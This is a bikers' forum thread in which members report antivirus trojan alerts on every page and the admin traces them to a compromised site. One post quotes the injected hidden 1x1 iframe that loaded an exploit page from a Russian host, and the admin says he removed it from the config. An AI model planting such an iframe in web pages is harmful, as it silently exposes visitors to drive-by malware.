nice forum..

just thought you'd like to know that mcafee detects a virus (trojan) on every page of this forum, pain in the arse!

Did you click on any of the links sent in that spam email the othr day?

nope, only signed up yesterday...

mcafee is usually pretty good with picking up stuff other virus checkers dont, though.. might want to check it out.

yep

this is what the work anti V SW is deleting

JS/Exploit-HelpXSite

its a trojan and i did not click on any emails. in fact i use a dif.. email address.

that was me BTW

this is what the work anti V SW is deleting

JS/Exploit-HelpXSite

its a trojan and i did not click on any emails. in fact i use a dif.. email address.

that's the one, m8

So are you all saying you get that when you visit any page on the forum? That doesnt make sense... since it was hacked I replaced every single file that the forum uses... ahhh, but i did copy back the avatars and rack logos... maybe its hidden in one of those.

Let me know if its still happening (and what pages cause it) and i'll remove the avatars and rank images to see if it stops.

Dan.

all of em and every time i move from one page to another

and its still happening

Spanky

Have you ensured that you have all the critical updates from Microsoft?

I kept getting a script trying to run every time i refreshed a page on this website, i had missed an update that addresses the problem, installed it and it is no longer a problem ;)

test your browser here ;)

http://bcheck.scanit.be/bcheck/

my browser's fine apparently.

i think the problem you were experiencing is non-perfect code pushing the browser to ask you if you want to debug. that message has stopped appearing a few updates ago, as the general user didn't know how to turn it off.

the problem is a trojan somewhere in this forum's code exploiting java and it's quite likely that you don't know about it because your antivirus software hasn't picked it up.

if i were you i'd run an online scan here (http://housecall.trendmicro.com) and see if anything comes up.

Mine wasnt a script debug, it was a command prompt being opened ;) and a request for netlog.hta ;)

The bug was associated with quite a few trojans/Virii up until Microsoft released a patch that closed the vulnerability.

it's stopped coming up now... how strange.. back to bikes! :D

I think the trojan or at least the hijack is still in place, on the front of the site if you hover the mouse over the forum icon, and look at the bottom of the status bar on the browser it should show the www.essexbikers.co.uk/forum address.

However once you have clicked that, if when the forums index opens you use the drop down menu of Internet explorers' "back" button it seems to be showing a russian address resolving to techlabs.ru as the page that was previously visited.

Is the site hosted there?

Also if you then try to click on the last link ( i.e http://techlabs.ru/templates blah blah it does nothing at all

But if you then click on the drop down menu for the "forward" button it is showing a 404 error file not found.

Weird

Also i noticed on my browser that as it enters the forum, at the bottom of the status bar it is trying to resolve somewhere else, getting kicked out and then booted back to essex bikers.

And lastly since this started i cant just click back on my browser, i have to click twice each time now.

I have taken screen shots to show what i mean, if you want them Dan (if this is sounding suspicious) then let me know.

Thanks for all that info.

I've just tried to do as you say, but the address does not appear in my back list. Can you mail me the screenshots or post them on here?

Thanks.

Dan.

well well well... look what i just found hidden in the code on the site:

"iframe src=http://techlabs.ru/forum/templates/subSilver/images/lang_russian/ie/index.php frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe"
</span>

Lateshift - I've sussed the problem. It was hidden in the config, not the files that run the site itself.

Its been removed now so you shouldnt get the problem anymore (unless they hid it anywhere else).

Let me know.

Thanks again.

Dan.

That seems to have sorted it Dan, thought something looked amiss and my cynicism led me to it :D

Well i am just nosey and like to look at code :D

w00t aren't u the lil private eye investigator.... good job lad :lol:

nice 1

yep its fixed for me to

well done dan

spanky